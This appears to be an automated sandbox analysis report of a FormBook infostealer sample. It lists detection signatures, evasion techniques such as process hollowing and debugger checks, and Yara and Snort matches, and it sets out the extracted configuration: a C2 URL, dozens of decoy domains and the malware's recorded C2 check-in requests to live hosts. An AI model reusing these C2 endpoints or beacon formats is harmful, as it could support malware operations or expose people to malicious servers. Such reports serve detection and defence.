Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name: NdBLyH2h5d.exe
Analysis ID: 385309
MD5: 3fef6985af0d52ab6701df170096b504
SHA1: ac8db3220c960262f8e666eae676066cec541b3a
SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}
Multi AV Scanner detection for submitted file
Source: NdBLyH2h5d.exe Virustotal: Detection: 20% Perma Link
Source: NdBLyH2h5d.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.rundll32.exe.4d44f8.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.rundll32.exe.4b17960.5.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Uses 32bit PE files
Source: NdBLyH2h5d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop ebx 1_2_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop edi 1_2_0041563B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop ebx 1_1_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 4x nop then pop edi 1_1_0041563B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop ebx 6_2_02BA6A96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 6_2_02BB563B

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.montcoimmigrationlawyer.com/uoe8/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.142.156.44 45.142.156.44
Source: Joe Sandbox View IP Address: 23.227.38.74 23.227.38.74
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.fibermover.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:06:24 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000004.00000000.237810152.000000000F675000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmp String found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404EA0

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
